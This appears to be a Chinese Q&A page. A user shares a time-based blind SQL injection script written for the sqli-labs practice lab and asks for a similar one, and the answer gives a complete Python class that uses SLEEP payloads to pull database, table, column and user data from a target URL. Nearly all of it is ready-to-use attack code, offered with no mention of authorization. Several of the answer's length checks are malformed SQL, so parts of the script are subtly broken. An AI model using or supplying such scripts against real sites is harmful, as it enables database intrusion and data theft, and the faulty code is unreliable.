import time import requests def get_data_len(url, data_payload): length = 1 while True: data = f"id=1' and if(LENGTH({data_payload})>{length},sleep(0.4),1)--+" start_time = time.time() response = requests.get(url, params=data) end_time = time.time() if end_time - start_time >= 0.4: length += 1 else: break return length def get_ASCII(url, ascii_payload): ascii_value = '' for i in range(1, len(ascii_payload) + 1): left = 32 right = 126 while left <= right: mid = left + (right - left) // 2 data = f"id=1' and if(ASCII(SUBSTRING({ascii_payload}, {i}, 1))>{mid},sleep(0.4),1)--+" start_time = time.time() response = requests.get(url, params=data) end_time = time.time() if end_time - start_time >= 0.4: left = mid + 1 else: right = mid - 1 ascii_value += chr(left) return ascii_value def get_schema_name(url): len = get_data_len(url, 'database()') print('获取数据库名字') db_name = get_ASCII(url, f'substr(database(),1,{len})') print(db_name) def get_table_name(url): table_name = get_ASCII(url, '(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database())') print(table_name) def get_column_names(url, table_name): column_names = get_ASCII(url, f"(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}')") print(column_names) def get_column_data(url, table_name, column_name): column_data = get_ASCII(url, f"(SELECT GROUP_CONCAT({column_name}) FROM {table_name})") print(column_data) url = "http://192.168.124.128/sqli-labs-master/Less-9/??id=1/" print('开始') get_schema_name(url) print() get_table_name(url) get_column_names(url,'emails') table_name = 'emails' column_name = 'email_id' get_column_data(url, table_name, column_name)帮我写个类似这样的python时间盲注脚本
时间: 2024-04-27 16:20:13 浏览: 22
好的,以下是一个简单的时间盲注脚本示例:
```python
import requests
import time
class TimeBasedSQLi:
def __init__(self, url, sleep_time=0.5):
self.url = url
self.sleep_time = sleep_time
def make_request(self, payload):
data = {"id": f"1' AND {payload} AND '1'='1"}
start_time = time.time()
response = requests.get(self.url, params=data)
end_time = time.time()
if end_time - start_time >= self.sleep_time:
return True
else:
return False
def get_db_name(self):
length = 1
while True:
payload = f"IF(LENGTH(database())>{length},SLEEP({self.sleep_time}),1)"
if self.make_request(payload):
length += 1
else:
break
db_name = ''
for i in range(1, length):
for j in range(32, 127):
payload = f"IF(ASCII(SUBSTRING(database(), {i}, 1))={j},SLEEP({self.sleep_time}),1)"
if self.make_request(payload):
db_name += chr(j)
break
return db_name
def get_table_names(self):
table_names = ''
payload = f"(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{self.get_db_name()}')"
length = 1
while True:
check_payload = f"IF(LENGTH(({payload}),{length}),SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
length += 1
else:
break
for i in range(1, length):
for j in range(32, 127):
check_payload = f"IF(ASCII(SUBSTRING(({payload}),{i},1))={j},SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
table_names += chr(j)
break
return table_names.split(',')
def get_column_names(self, table_name):
column_names = ''
payload = f"(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}')"
length = 1
while True:
check_payload = f"IF(LENGTH(({payload}),{length}),SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
length += 1
else:
break
for i in range(1, length):
for j in range(32, 127):
check_payload = f"IF(ASCII(SUBSTRING(({payload}),{i},1))={j},SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
column_names += chr(j)
break
return column_names.split(',')
def get_column_data(self, table_name, column_name):
column_data = ''
payload = f"(SELECT GROUP_CONCAT({column_name}) FROM {table_name})"
length = 1
while True:
check_payload = f"IF(LENGTH(({payload}),{length}),SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
length += 1
else:
break
for i in range(1, length):
for j in range(32, 127):
check_payload = f"IF(ASCII(SUBSTRING(({payload}),{i},1))={j},SLEEP({self.sleep_time}),1)"
if self.make_request(check_payload):
column_data += chr(j)
break
return column_data.split(',')
# 示例用法
url = "http://example.com/vuln.php"
sqli = TimeBasedSQLi(url)
db_name = sqli.get_db_name()
print(f"Database name: {db_name}")
table_names = sqli.get_table_names()
print(f"Table names: {table_names}")
column_names = sqli.get_column_names('users')
print(f"Column names: {column_names}")
column_data = sqli.get_column_data('users', 'username')
print(f"Column data: {column_data}")
```
注意,这只是一个基本的脚本示例,具体的使用方法和payload需要根据实际情况进行调整。